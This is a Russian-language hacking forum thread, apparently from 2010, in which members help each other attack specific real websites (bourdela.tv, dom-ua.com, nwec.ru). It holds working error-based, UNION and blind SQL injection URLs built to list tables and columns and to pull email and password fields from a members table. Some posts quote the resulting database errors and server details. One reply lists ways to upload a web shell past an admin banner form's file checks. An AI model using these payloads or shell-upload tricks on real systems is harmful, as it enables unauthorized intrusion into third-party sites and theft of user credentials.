13.03.2010, 07:45
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Pashkela
Код:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/0,1)a)*'
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/1,1)a)*'
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/2,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/2,1)a)*'
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
говорит
SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
|
|
|
13.03.2010, 08:36
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Сообщение от YuNi|[c
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
говорит
SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns
Откуда должны быть в information_schema.columns пароли и емайлы?!
|
|
|
|
13.03.2010, 14:18
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
говорит
SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
Сообщение от ILYAtirtir
Откуда должны быть в information_schema.columns пароли и емайлы?!
ну в information_schema.columns должны быть все имена колонок |
|
|
|
13.03.2010, 15:30
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Сообщение от YuNi|[c
ну в information_schema.columns должны быть все имена колонок
Ну они там и есть,делается вот так:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
Дальше через лимит.Можно не перебирать а сделать вот так:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
Код:
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
|
|
|
|
13.03.2010, 12:40
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
С нами:
9124815
Репутация:
10
|
|
Сообщение от Strilo4ka
ругаемся на юнион + селект !!!
ps 5 ветка
Не удивительно, ведь SQL запросов походу два(или больше) т.к.
Код:
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+52/*
еще что-то выдает, а
Код:
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+53/*
Уже вообще пустой экран
|
|
|
|
11.03.2010, 17:29
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами:
8943448
Репутация:
127
|
|
народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет
|
|
|
|
11.03.2010, 17:51
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Bramin
народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет
способов масса, большинство описаны на форуме.
обрезать нульбайтом, двойное расширение, загрузка файла как есть, с последующим инклюдом его (если LFI на сайте или серве) ну и некоторые другие способы
|
|
|
|
11.03.2010, 17:40
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
http://www.nwec.ru/index.php?issue_id=57
Мучаюсь,мучаюсь, решил спросить, можно ли что сделать с этим сайтиком, id повсюду, фильтрация ничего не дает сделать..( Помогите.
Вот смотри:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+--+
|
|
|
|
11.03.2010, 18:01
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Да,вывод видел,это слепая,да?Так как узнать уязвимое поле?(
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.
Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось?
|
|
|
|
11.03.2010, 18:06
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от CyberHunter
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.
Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось? а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая:
Код:
http://www.nwec.ru/index.php?issue_id=57+and+substring(version(),1,1)=5
@@basedir: /usr/
@@tmpdir: /tmp/
@@datadir: /data/
version(): 5.0.77-log
database(): db_cevzap_1
@@version_compile_os: unknown-linux-gnu
хотя может и не так)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
